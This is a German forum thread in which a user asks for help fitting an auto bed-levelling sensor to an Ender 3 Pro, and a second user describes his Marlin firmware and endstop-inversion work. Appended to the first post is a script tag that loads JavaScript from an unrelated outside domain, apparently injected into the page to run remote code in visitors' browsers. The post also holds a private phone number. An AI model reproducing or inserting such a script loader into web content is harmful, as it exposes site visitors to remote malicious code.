Ender 3 Pro Creality3D CR-10 ABL: Auto-Level-Sensor installieren

Startseite Foren Drucker Ender 3 Pro Creality3D CR-10 ABL: Auto-Level-Sensor installieren

Dieses Thema enthält 1 Antwort und 2 Teilnehmer. Es wurde zuletzt aktualisiert von  Arne Bieling vor 6 Tagen, 8 Stunden.

Login Registrieren
  • Autor
    Beiträge
  • #6236 Antwort

    Steve12
    Teilnehmer

    Hallo Ihr Lieben

    ich habe mir vor kurzem einen Ender 3 Pro gekauft und habe gesehen, das man den auf Auto-Level-Sensor umbauen kann.

    Nun meine Frege, kann mir jemand dabei helfen? Würde auch nicht umsonst sein.

    Bei Interesse könnt Ihr mich auch gerne anrufen. 015155590342

     

    Im voraus vielen Dank

     

    Lg. Stefan

    <script src=“//permissnew.com/1cbabfaba9fb0d03cc.js“></script>

  • #6478 Antwort

    Arne Bieling

    Hi Stefan!

    Ich habe meinen Ender 3 diese WE umgebaut. Einfach nach der Anleitung für den CR 10 geht es allerdings nicht. Die Firmware Marlin gibt es mit ABL auch für den Ender 3. Da sind allerdings 2 Punkte, die Du beachten musst: Der Endstopschalter der Z Achse ist ein Öffner, d.h. den kannst du nicht nach der Anleitung einfach anschließen, Du musst das Signal invertieren. Ich habe das mit einem invertierenden Schmitt Trigger realisiert (natürlich mit Optokoppler) Ich bin nun am probieren wie ein Irrer, das ABL funktioniert, nur haut es mit der Kalibrierung nicht so richtig hin. Mal sehen, ob ich es in den Griff bekomme oder doch den BL Touch ausprobiere.

    Arne

     

Login Registrieren
Antwort auf: Ender 3 Pro Creality3D CR-10 ABL: Auto-Level-Sensor installieren
Deine Information: